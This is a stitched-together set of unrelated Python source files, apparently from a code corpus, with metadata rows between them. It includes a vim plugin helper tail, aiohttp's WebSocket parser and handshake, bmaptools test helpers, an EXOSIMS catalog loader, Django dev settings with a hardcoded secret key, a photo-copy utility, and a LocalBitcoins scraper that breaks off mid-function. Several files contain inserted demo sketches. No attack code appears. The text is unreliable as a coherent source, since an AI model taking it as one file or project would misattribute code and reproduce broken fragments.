then = time.time() + (timeout / 1000.0)
timeouts[then].append(timeout_func)
return timeout_id
def cancel_timeout(timeout_id):
if timeout_id in timeouts:
cancelled_timeouts.add(timeout_id)
def call_timeouts():
global calling_timeouts
if calling_timeouts:
return
calling_timeouts = True
now = time.time()
to_remove = []
for t, tos in timeouts.items():
if now >= t:
for timeout in tos:
timeout()
to_remove.append(t)
for k in to_remove:
del timeouts[k]
calling_timeouts = False
def error_message(*args, **kwargs):
editor = getattr(G, 'editor', None)
if editor:
editor.error_message(*args, **kwargs)
else:
print(args, kwargs)
def status_message(msg):
editor = getattr(G, 'editor', None)
if editor:
editor.status_message(msg)
else:
print(msg)
def message_dialog(message):
msg.log(message)
def vim_choice(prompt, default, choices):
default = choices.index(default) + 1
choices_str = '\n'.join(['&%s' % choice for choice in choices])
try:
choice = int(vim.eval('confirm("%s", "%s", %s)' % (prompt, choices_str, default)))
except KeyboardInterrupt:
return None
if choice == 0:
return None
return choices[choice - 1]
def ok_cancel_dialog(prompt):
choice = vim_choice(prompt, 'ok', ['ok', 'cancel'])
return choice == 'ok'
def open_file(filename):
current_buffer = vim.eval('expand("%:p")')
if current_buffer != filename:
vim.command(':silent! edit! %s | :silent! :filetype detect' % filename)
def platform():
return sys.platform
def get_line_endings(path=None):
return line_endings
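# --- Illustrative sketch, not part of the original plugin ---
# Demonstrates the set_timeout/call_timeouts pair. call_timeouts() is normally
# driven by the editor's event loop; here it is simply polled. The callback
# below is made up for demonstration.
def _demo_timeouts():
    fired = []
    set_timeout(lambda: fired.append('hello'), 10)
    while not fired:
        time.sleep(0.01)
        call_timeouts()
    return fired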
|
apache-2.0
| -7,985,132,652,886,116,000 | 21.65625 | 137 | 0.623103 | false |
saghul/aiohttp
|
aiohttp/websocket.py
|
1
|
8733
|
"""WebSocket protocol versions 13 and 8."""
__all__ = ['WebSocketParser', 'WebSocketWriter', 'do_handshake',
'Message', 'WebSocketError',
'MSG_TEXT', 'MSG_BINARY', 'MSG_CLOSE', 'MSG_PING', 'MSG_PONG']
import base64
import binascii
import collections
import hashlib
import struct
from aiohttp import errors
from aiohttp.log import ws_logger
# Frame opcodes defined in the spec.
OPCODE_CONTINUATION = 0x0
MSG_TEXT = OPCODE_TEXT = 0x1
MSG_BINARY = OPCODE_BINARY = 0x2
MSG_CLOSE = OPCODE_CLOSE = 0x8
MSG_PING = OPCODE_PING = 0x9
MSG_PONG = OPCODE_PONG = 0xa
WS_KEY = b'258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
WS_HDRS = ('UPGRADE',
'CONNECTION',
'SEC-WEBSOCKET-VERSION',
'SEC-WEBSOCKET-KEY',
'SEC-WEBSOCKET-PROTOCOL')
Message = collections.namedtuple('Message', ['tp', 'data', 'extra'])
class WebSocketError(Exception):
"""WebSocket protocol parser error."""
def WebSocketParser(out, buf):
while True:
message = yield from parse_message(buf)
out.feed_data(message)
if message.tp == MSG_CLOSE:
out.feed_eof()
break
def parse_frame(buf):
"""Return the next frame from the socket."""
# read header
data = yield from buf.read(2)
first_byte, second_byte = struct.unpack('!BB', data)
fin = (first_byte >> 7) & 1
rsv1 = (first_byte >> 6) & 1
rsv2 = (first_byte >> 5) & 1
rsv3 = (first_byte >> 4) & 1
opcode = first_byte & 0xf
# frame-fin = %x0 ; more frames of this message follow
# / %x1 ; final frame of this message
# frame-rsv1 = %x0 ; 1 bit, MUST be 0 unless negotiated otherwise
# frame-rsv2 = %x0 ; 1 bit, MUST be 0 unless negotiated otherwise
# frame-rsv3 = %x0 ; 1 bit, MUST be 0 unless negotiated otherwise
if rsv1 or rsv2 or rsv3:
raise WebSocketError('Received frame with non-zero reserved bits')
if opcode > 0x7 and fin == 0:
raise WebSocketError('Received fragmented control frame')
if fin == 0 and opcode == OPCODE_CONTINUATION:
raise WebSocketError(
'Received new fragment frame with non-zero opcode')
has_mask = (second_byte >> 7) & 1
length = (second_byte) & 0x7f
# Control frames MUST have a payload length of 125 bytes or less
if opcode > 0x7 and length > 125:
raise WebSocketError(
"Control frame payload cannot be larger than 125 bytes")
# read payload
if length == 126:
data = yield from buf.read(2)
length = struct.unpack_from('!H', data)[0]
elif length > 126:
data = yield from buf.read(8)
length = struct.unpack_from('!Q', data)[0]
if has_mask:
mask = yield from buf.read(4)
if length:
payload = yield from buf.read(length)
else:
payload = b''
if has_mask:
payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
return fin, opcode, payload
def parse_message(buf):
fin, opcode, payload = yield from parse_frame(buf)
if opcode == OPCODE_CLOSE:
if len(payload) >= 2:
close_code = struct.unpack('!H', payload[:2])[0]
close_message = payload[2:]
return Message(OPCODE_CLOSE, close_code, close_message)
elif payload:
raise WebSocketError(
'Invalid close frame: {} {} {!r}'.format(fin, opcode, payload))
return Message(OPCODE_CLOSE, 0, '')
elif opcode == OPCODE_PING:
return Message(OPCODE_PING, payload, '')
elif opcode == OPCODE_PONG:
return Message(OPCODE_PONG, payload, '')
elif opcode not in (OPCODE_TEXT, OPCODE_BINARY):
raise WebSocketError("Unexpected opcode={!r}".format(opcode))
# load text/binary
data = [payload]
while not fin:
fin, _opcode, payload = yield from parse_frame(buf)
if _opcode != OPCODE_CONTINUATION:
raise WebSocketError(
'The opcode in non-fin frame is expected '
'to be zero, got {!r}'.format(opcode))
else:
data.append(payload)
if opcode == OPCODE_TEXT:
return Message(OPCODE_TEXT, b''.join(data).decode('utf-8'), '')
else:
return Message(OPCODE_BINARY, b''.join(data), '')
class WebSocketWriter:
def __init__(self, writer):
self.writer = writer
def _send_frame(self, message, opcode):
"""Send a frame over the websocket with message as its payload."""
header = bytes([0x80 | opcode])
msg_length = len(message)
if msg_length < 126:
header += bytes([msg_length])
elif msg_length < (1 << 16):
header += bytes([126]) + struct.pack('!H', msg_length)
else:
header += bytes([127]) + struct.pack('!Q', msg_length)
self.writer.write(header + message)
def pong(self, message=b''):
"""Send pong message."""
if isinstance(message, str):
message = message.encode('utf-8')
self._send_frame(message, OPCODE_PONG)
def ping(self, message=b''):
"""Send ping message."""
if isinstance(message, str):
message = message.encode('utf-8')
self._send_frame(message, OPCODE_PING)
def send(self, message, binary=False):
"""Send a frame over the websocket with message as its payload."""
if isinstance(message, str):
message = message.encode('utf-8')
if binary:
self._send_frame(message, OPCODE_BINARY)
else:
self._send_frame(message, OPCODE_TEXT)
def close(self, code=1000, message=b''):
"""Close the websocket, sending the specified code and message."""
if isinstance(message, str):
message = message.encode('utf-8')
self._send_frame(
struct.pack('!H%ds' % len(message), code, message),
opcode=OPCODE_CLOSE)
def do_handshake(method, headers, transport, protocols=()):
"""Prepare WebSocket handshake. It return http response code,
response headers, websocket parser, websocket writer. It does not
perform any IO.
`protocols` is a sequence of known protocols. On successful handshake,
the returned response headers contain the first protocol in this list
which the server also knows."""
# WebSocket accepts only GET
if method.upper() != 'GET':
raise errors.HttpProcessingError(code=405, headers=(('Allow', 'GET'),))
if 'websocket' != headers.get('UPGRADE', '').lower().strip():
raise errors.HttpBadRequest(
message='No WebSocket UPGRADE hdr: {}\n'
'Can "Upgrade" only to "WebSocket".'.format(
headers.get('UPGRADE')))
if 'upgrade' not in headers.get('CONNECTION', '').lower():
raise errors.HttpBadRequest(
message='No CONNECTION upgrade hdr: {}'.format(
headers.get('CONNECTION')))
# find common sub-protocol between client and server
protocol = None
if 'SEC-WEBSOCKET-PROTOCOL' in headers:
req_protocols = [str(proto.strip()) for proto in
headers['SEC-WEBSOCKET-PROTOCOL'].split(',')]
for proto in req_protocols:
if proto in protocols:
protocol = proto
break
else:
# No overlap found: Return no protocol as per spec
ws_logger.warning(
'Client protocols %r don’t overlap server-known ones %r',
protocols, req_protocols)
# check supported version
version = headers.get('SEC-WEBSOCKET-VERSION')
if version not in ('13', '8', '7'):
raise errors.HttpBadRequest(
message='Unsupported version: {}'.format(version),
headers=(('Sec-WebSocket-Version', '13', '8', '7'),))
# check client handshake for validity
key = headers.get('SEC-WEBSOCKET-KEY')
try:
if not key or len(base64.b64decode(key)) != 16:
raise errors.HttpBadRequest(
message='Handshake error: {!r}'.format(key))
except binascii.Error:
raise errors.HttpBadRequest(
message='Handshake error: {!r}'.format(key)) from None
response_headers = [
('UPGRADE', 'websocket'),
('CONNECTION', 'upgrade'),
('TRANSFER-ENCODING', 'chunked'),
('SEC-WEBSOCKET-ACCEPT', base64.b64encode(
hashlib.sha1(key.encode() + WS_KEY).digest()).decode())]
if protocol:
response_headers.append(('SEC-WEBSOCKET-PROTOCOL', protocol))
# response code, headers, parser, writer, protocol
return (101,
response_headers,
WebSocketParser,
WebSocketWriter(transport),
protocol)
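# --- Illustrative sketch, not part of the original module ---
# Shows the byte layout WebSocketWriter produces for a short unmasked text
# frame; the _Collector class below is a stand-in for an asyncio transport
# and exists only for this demonstration.
class _Collector:
    def __init__(self):
        self.data = b''
    def write(self, chunk):
        self.data += chunk
def _demo_text_frame():
    transport = _Collector()
    WebSocketWriter(transport).send('hi')
    # 0x81 = FIN bit + text opcode, 0x02 = unmasked 2-byte payload length.
    assert transport.data == b'\x81\x02hi'
    return transport.data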
|
apache-2.0
| 6,830,857,299,312,674,000 | 31.94717 | 79 | 0.596953 | false |
seiferteric/bmaptools
|
tests/helpers.py
|
1
|
10844
|
# Copyright (c) 2012-2013 Intel, Inc.
# License: GPLv2
# Author: Artem Bityutskiy <artem.bityutskiy@linux.intel.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
"""
This module contains independent functions shared between various
tests.
"""
# Disable the following pylint recommendations:
# * Too many statements (R0915)
# pylint: disable=R0915
import tempfile
import random
import itertools
import hashlib
import sys
from bmaptools import BmapHelpers, BmapCopy, TransRead
def _create_random_sparse_file(file_obj, size):
"""
Create a sparse file with randomly distributed holes. The mapped areas are
filled with semi-random data. Returns a tuple containing 2 lists:
1. a list of mapped block ranges, same as 'Filemap.get_mapped_ranges()'
2. a list of unmapped block ranges (holes), same as
'Filemap.get_unmapped_ranges()'
"""
file_obj.truncate(0)
block_size = BmapHelpers.get_block_size(file_obj)
blocks_cnt = (size + block_size - 1) / block_size
def process_block(block):
"""
This is a helper function which processes a block. It randomly decides
whether the block should be filled with random data or should become a
hole. Returns 'True' if the block was mapped and 'False' otherwise.
"""
map_the_block = random.getrandbits(1)
if map_the_block:
# Randomly select how much we are going to write
seek = random.randint(0, block_size - 1)
write = random.randint(1, block_size - seek)
assert seek + write <= block_size
file_obj.seek(block * block_size + seek)
file_obj.write(chr(random.getrandbits(8)) * write)
else:
file_obj.truncate(block * block_size)
return map_the_block
mapped = []
unmapped = []
iterator = xrange(0, blocks_cnt)
for was_mapped, group in itertools.groupby(iterator, process_block):
# Start of a mapped region or a hole. Find the last element in the
# group.
first = group.next()
last = first
for last in group:
pass
if was_mapped:
mapped.append((first, last))
else:
unmapped.append((first, last))
file_obj.truncate(size)
file_obj.flush()
return (mapped, unmapped)
def _create_random_file(file_obj, size):
"""
Fill the 'file_obj' file object with semi-random data up to the size 'size'.
"""
chunk_size = 1024 * 1024
written = 0
while written < size:
if written + chunk_size > size:
chunk_size = size - written
file_obj.write(chr(random.getrandbits(8)) * chunk_size)
written += chunk_size
file_obj.flush()
def generate_test_files(max_size=4*1024*1024, directory=None, delete=True):
"""
This is a generator which yields files which other tests use as the input
for the testing. The generator tries to yield "interesting" files which
cover various corner-cases. For example, a large hole file, a file with
no holes, files of unaligned length, etc.
The 'directory' argument specifies the directory path where the yielded
test files should be created. The 'delete' argument specifies whether the
yielded test files have to be automatically deleted.
The generator yields tuples consisting of the following elements:
1. the test file object
2. file size in bytes
3. a list of mapped block ranges, same as 'Filemap.get_mapped_ranges()'
4. a list of unmapped block ranges (holes), same as
'Filemap.get_unmapped_ranges()'
"""
#
# Generate sparse files with one single hole spanning the entire file
#
# A block-sized hole
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Khole_",
delete=delete, dir=directory,
suffix=".img")
block_size = BmapHelpers.get_block_size(file_obj)
file_obj.truncate(block_size)
yield (file_obj, block_size, [], [(0, 0)])
file_obj.close()
# A block size + 1 byte hole
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Khole_plus_1_",
delete=delete, dir=directory,
suffix=".img")
file_obj.truncate(block_size + 1)
yield (file_obj, block_size + 1, [], [(0, 1)])
file_obj.close()
# A block size - 1 byte hole
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Khole_minus_1_",
delete=delete, dir=directory,
suffix=".img")
file_obj.truncate(block_size - 1)
yield (file_obj, block_size - 1, [], [(0, 0)])
file_obj.close()
# A 1-byte hole
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="1byte_hole_",
delete=delete, dir=directory,
suffix=".img")
file_obj.truncate(1)
yield (file_obj, 1, [], [(0, 0)])
file_obj.close()
# And 10 holes of random size
for i in xrange(10):
size = random.randint(1, max_size)
file_obj = tempfile.NamedTemporaryFile("wb+", suffix=".img",
delete=delete, dir=directory,
prefix="rand_hole_%d_"%i)
file_obj.truncate(size)
blocks_cnt = (size + block_size - 1) / block_size
yield (file_obj, size, [], [(0, blocks_cnt - 1)])
file_obj.close()
#
# Generate a random sparse files
#
# The maximum size
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="sparse_",
delete=delete, dir=directory,
suffix=".img")
mapped, unmapped = _create_random_sparse_file(file_obj, max_size)
yield (file_obj, max_size, mapped, unmapped)
file_obj.close()
# The maximum size + 1 byte
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="sparse_plus_1_",
delete=delete, dir=directory,
suffix=".img")
mapped, unmapped = _create_random_sparse_file(file_obj, max_size + 1)
yield (file_obj, max_size + 1, mapped, unmapped)
file_obj.close()
# The maximum size - 1 byte
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="sparse_minus_1_",
delete=delete, dir=directory,
suffix=".img")
mapped, unmapped = _create_random_sparse_file(file_obj, max_size - 1)
yield (file_obj, max_size - 1, mapped, unmapped)
file_obj.close()
# And 10 files of random size
for i in xrange(10):
size = random.randint(1, max_size)
file_obj = tempfile.NamedTemporaryFile("wb+", suffix=".img",
delete=delete, dir=directory,
prefix="sparse_%d_"%i)
mapped, unmapped = _create_random_sparse_file(file_obj, size)
yield (file_obj, size, mapped, unmapped)
file_obj.close()
#
# Generate random fully-mapped files
#
# A block-sized file
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Kmapped_",
delete=delete, dir=directory,
suffix=".img")
_create_random_file(file_obj, block_size)
yield (file_obj, block_size, [(0, 0)], [])
file_obj.close()
# A block size + 1 byte file
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Kmapped_plus_1_",
delete=delete, dir=directory,
suffix=".img")
_create_random_file(file_obj, block_size + 1)
yield (file_obj, block_size + 1, [(0, 1)], [])
file_obj.close()
# A block size - 1 byte file
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Kmapped_minus_1_",
delete=delete, dir=directory,
suffix=".img")
_create_random_file(file_obj, block_size - 1)
yield (file_obj, block_size - 1, [(0, 0)], [])
file_obj.close()
# A 1-byte file
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="1byte_mapped_",
delete=delete, dir=directory,
suffix=".img")
_create_random_file(file_obj, 1)
yield (file_obj, 1, [(0, 0)], [])
file_obj.close()
# And 10 mapped files of random size
for i in xrange(10):
size = random.randint(1, max_size)
file_obj = tempfile.NamedTemporaryFile("wb+", suffix=".img",
delete=delete, dir=directory,
prefix="rand_mapped_%d_" % i)
_create_random_file(file_obj, size)
blocks_cnt = (size + block_size - 1) / block_size
yield (file_obj, size, [(0, blocks_cnt - 1)], [])
file_obj.close()
def calculate_chksum(file_path):
"""Calculates checksum for the contents of file 'file_path'."""
file_obj = TransRead.TransRead(file_path)
hash_obj = hashlib.new("sha256")
chunk_size = 1024*1024
while True:
chunk = file_obj.read(chunk_size)
if not chunk:
break
hash_obj.update(chunk)
file_obj.close()
return hash_obj.hexdigest()
def copy_and_verify_image(image, dest, bmap, image_chksum, image_size):
"""
Copy image 'image' using bmap file 'bmap' to the destination file 'dest'
and verify the resulting image checksum.
"""
f_image = TransRead.TransRead(image)
f_dest = open(dest, "w+")
if (bmap):
f_bmap = open(bmap, "r")
else:
f_bmap = None
writer = BmapCopy.BmapCopy(f_image, f_dest, f_bmap, image_size)
# Randomly decide whether we want the progress bar or not
if bool(random.getrandbits(1)):
writer.set_progress_indicator(sys.stdout, None)
writer.copy(bool(random.getrandbits(1)), bool(random.getrandbits(1)))
# Compare the original file and the copy are identical
assert calculate_chksum(dest) == image_chksum
if f_bmap:
f_bmap.close()
f_dest.close()
f_image.close()
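# --- Illustrative sketch, not part of the original helpers ---
# Walks the generated test files and prints their hole/mapped layout; the
# 128 KiB size cap is an arbitrary choice for demonstration.
def _demo_generated_files():
    for file_obj, size, mapped, unmapped in generate_test_files(max_size=128*1024):
        print "%s: %d bytes, %d mapped range(s), %d hole(s)" \
              % (file_obj.name, size, len(mapped), len(unmapped))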
|
gpl-2.0
| -6,630,529,943,013,134,000 | 35.635135 | 80 | 0.57239 | false |
dsavransky/EXOSIMS
|
EXOSIMS/StarCatalog/SIMBAD300Catalog.py
|
1
|
1291
|
# -*- coding: utf-8 -*-
from EXOSIMS.StarCatalog.SIMBADCatalog import SIMBADCatalog
from EXOSIMS.util.get_dirs import get_cache_dir
import os, inspect
class SIMBAD300Catalog(SIMBADCatalog):
"""SIMBAD300 Catalog class
This class populates the star catalog used in EXOSIMS from the SIMBAD300
catalog.
"""
def __init__(self, cachedir=None, **specs):
self.cachedir = get_cache_dir(cachedir)
classpath = os.path.split(inspect.getfile(self.__class__))[0]
filename = 'SIMBAD300'
pklpath = os.path.join(self.cachedir, filename + '.pkl')
matpath = os.path.join(classpath, filename + '.mat')
# check if given filename exists as .pkl file already
if os.path.exists(pklpath):
self.populatepkl(pklpath, **specs)
self.vprint('Loaded %s.pkl star catalog'%filename)
# check if given filename exists as a .mat file but not .pkl file
elif os.path.exists(matpath):
self.SIMBAD_mat2pkl(matpath, pklpath)
self.populatepkl(pklpath, **specs)
self.vprint('Loaded %s.mat star catalog'%filename)
# otherwise print error
else:
self.vprint('Could not load SIMBAD300 star catalog')
|
bsd-3-clause
| 8,737,107,476,047,672,000 | 38.34375 | 77 | 0.620449 | false |
thedanotto/google-maps-urlerator
|
google_maps_urlerator/settings/local_mini.py
|
1
|
4841
|
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'google_maps_urlerator.sqlite3', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'static', 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'static', 'static-only')
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'static', 'static'),
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'hk)&m=(63&&dmy2501(z3$k(1zbav7*ubsa@4_f7crig-p8#c%'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'google_maps_urlerator.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'google_maps_urlerator.wsgi.application'
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'static', 'templates'),
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'stripe',
'registration',
'south',
'urlerator',
)
|
mit
| 3,139,702,584,782,255,000 | 36.246154 | 127 | 0.706259 | false |
virantha/photokeeper
|
photokeeper/filecopy.py
|
1
|
2553
|
# Copyright 2016 Virantha Ekanayake All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import os, shutil, logging
from photokeeper.target import TargetBase
class FileCopy(TargetBase):
def __init__(self):
pass
def check_duplicates(self, images):
""" This is easy, since all the functionality is built into the source image file
object
"""
print("Checking for duplicates")
images_1, images_2 = itertools.tee(images)
for total,img in enumerate(images_1):
if img.is_duplicate():
img.dup = True
n_dups = [i for i in images_2 if i.dup]
print('Found {} duplicates out of {} images'.format(len(n_dups), total+1))
def _get_unique_filename_suffix(self, filename):
dirname = os.path.dirname(filename)
fn_with_ext = os.path.basename(filename)
fn, ext = os.path.splitext(fn_with_ext)
suffix = 1
if not os.path.exists(filename): # Unique, no target filename conflict
return filename
else:
while os.path.exists(os.path.join(dirname, fn+'_'+str(suffix)+ext)):
suffix += 1
return (os.path.join(dirname, fn+'_'+str(suffix)+ext))
def execute_copy(self, images):
skip_count = 0
print("Copying and sorting files")
for total, img in enumerate(images):
if img.dup:
skip_count+=1
continue
srcfn = img.srcpath
tgtfn = img.tgtpath
tgtdir = os.path.dirname(tgtfn)
tgtfn = self._get_unique_filename_suffix(tgtfn)
logging.info("Copying %s to %s" % (srcfn, tgtfn))
if not os.path.exists(tgtdir):
logging.info("Creating directory {}".format(tgtdir))
os.makedirs(tgtdir)
shutil.copyfile(srcfn, tgtfn)
print ("Skipped {} duplicate files".format(skip_count))
print ("Copied {} files".format(total+1-skip_count))
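# --- Illustrative sketch, not part of the original module ---
# Shows how an existing target name gets a numeric suffix; the temp directory
# and file name below are created purely for demonstration.
def _demo_unique_suffix():
    import tempfile
    tmpdir = tempfile.mkdtemp()
    target = os.path.join(tmpdir, 'IMG_0001.jpg')
    open(target, 'w').close()  # pretend the first copy already exists
    # The existing 'IMG_0001.jpg' forces the fallback name 'IMG_0001_1.jpg'.
    return FileCopy()._get_unique_filename_suffix(target)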
|
apache-2.0
| 1,588,081,966,827,932,400 | 34.458333 | 89 | 0.617313 | false |
breeezzz/local-bitcoins-api
|
LocalBitcoins/market_depth.py
|
1
|
6253
|
'''
Created on 7 Jun 2013
@author: Jamie
'''
import urllib2
import math
import re
import itertools
import argparse
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
markets = {'UK': {'url': 'gb/united%20kingdom/', 'curr': 'GBP'},
'USA': {'url': 'us/united%20states/', 'curr': 'USD'},
'GERMANY': {'url': 'de/germany/', 'curr': 'EUR'},
'ITALY': {'url': 'it/italy/', 'curr': 'EUR'},
'SPAIN': {'url': 'es/spain/', 'curr': 'EUR'},
'AUSTRALIA': {'url': 'au/australia/', 'curr': 'AUD'},
'ARGENTINA': {'url': 'ar/argentina/', 'curr': 'ARS'},
'NETHERLANDS': {'url': 'nl/netherlands/', 'curr': 'EUR'},
'BRAZIL': {'url': 'br/brazil/', 'curr': 'BRL'},
'FRANCE': {'url': 'fr/france/', 'curr': 'EUR'},
'GBP': {'url': 'gbp/', 'curr': 'GBP'},
'USD': {'url': 'usd/', 'curr': 'USD'},
'EUR': {'url': 'eur/', 'curr': 'EUR'},
}
methods = {'NATIONAL_BANK_TRANSFER': 'national-bank-transfer/'}
method = ''
buy_url = 'https://localbitcoins.com/buy-bitcoins-online/'
sell_url = 'https://localbitcoins.com/sell-bitcoins-online/'
def get_ads_dict(soup, buy_sell):
prices = get_prices(soup)
users = get_users(soup)
amounts = get_amounts(soup)
amounts = [a/p for a,p in zip(amounts, prices)] # To give amount in BTC
currency = get_currency(soup)
methods = get_methods(soup)
lists = set(zip(prices, users, amounts, currency))
if buy_sell == 'buy':
sorted_ads = sorted(lists)
elif buy_sell == 'sell':
sorted_ads = sorted(lists)[::-1]
prices = [item[0] for item in sorted_ads]
users = [item[1] for item in sorted_ads]
amounts = [item[2] for item in sorted_ads]
currency = [item[3] for item in sorted_ads]
depth = get_depth(amounts)
ads_dict = {'users': users, 'prices': prices, 'amounts': amounts,
'depth': depth, 'currency': currency, 'methods': methods}
return ads_dict
def get_prices(soup):
''' Returns a list of prices '''
prices = soup.find_all('td', attrs={'class':"column-price"})
prices = [float(re.findall("\d+.\d+", price.get_text())[0]) for price in prices]
return prices
def get_currency(soup):
''' Returns a list of currencies '''
prices = soup.find_all('td', attrs={'class':"column-price"})
currencies = [price.get_text().split()[-1] for price in prices]
return currencies
def get_methods(soup):
''' Returns a list of payment methods '''
methods = soup.find_all('tr', attrs={'class':"clickable"})
methods = [method.get_text().split('\n')[-7].strip() for method in methods]
return methods
def get_users(soup):
''' Returns a list of users '''
users = soup.find_all('td', attrs={'class':"column-user"})
users = [user.get_text().split()[0] for user in users]
return users
def get_amounts(soup):
''' Returns a list of amounts '''
raw_amounts = soup.find_all('td', attrs={'class':"column-limit"})
amounts = []
for amount in raw_amounts:
try:
amounts += [float(amount.get_text().split()[2])]
except:
amounts += [0.0]
return amounts
def get_depth(amounts):
''' Generates the cumulative amount for each point on the curve '''
cum_amounts = []
cum_amount = 0
for amount in amounts:
cum_amount += amount
cum_amounts += [cum_amount]
return cum_amounts
def get_buy_curve(market):
response = urllib2.urlopen(buy_url + market['url'] + method)
soup = BeautifulSoup(response)
buy_ads = get_ads_dict(soup, 'buy')
buy_prices = [i for i,j in zip(buy_ads['prices'], buy_ads['currency']) if j == market['curr']]
buy_depth = [i for i,j in zip(buy_ads['depth'], buy_ads['currency']) if j == market['curr']]
buy_prices = double_list(buy_prices)[1:]
buy_depth = double_list(buy_depth)[:-1]
return buy_prices[:-2], buy_depth[:-2]
def get_sell_curve(market):
response = urllib2.urlopen(sell_url + market['url'] + method)
soup = BeautifulSoup(response)
sell_ads = get_ads_dict(soup, 'sell')
sell_prices = [i for i,j in zip(sell_ads['prices'], sell_ads['currency']) if j == market['curr']][::-1]
sell_depth = [i for i,j in zip(sell_ads['depth'], sell_ads['currency']) if j == market['curr']][::-1]
sell_prices = double_list(sell_prices)[1:]
sell_depth = double_list(sell_depth)[:-1]
return sell_prices, sell_depth
def plot_chart(ax, buy, sell):
ax.plot(buy[0], buy[1], color='r')
ax.plot(sell[0], sell[1], color='g')
def double_list(list_in):
    ''' Repeat each element twice, e.g. [a, b] -> [a, a, b, b], producing the
    stepped price/depth points needed to draw the depth curves '''
    iters = [iter(list_in), iter(list_in)]
    return list(it.next() for it in itertools.cycle(iters))
def get_bid(country):
market = markets[country]
response = urllib2.urlopen(buy_url + market['url'] + method)
soup = BeautifulSoup(response)
buy_ads = get_ads_dict(soup, 'buy')
bid = buy_ads['prices'][0]
return bid
def get_ask(country):
market = markets[country]
response = urllib2.urlopen(sell_url + market['url'] + method)
soup = BeautifulSoup(response)
sell_ads = get_ads_dict(soup, 'sell')
ask = sell_ads['prices'][0]
return ask
def make_charts(*args):
if len(args[0].countries) == 0:
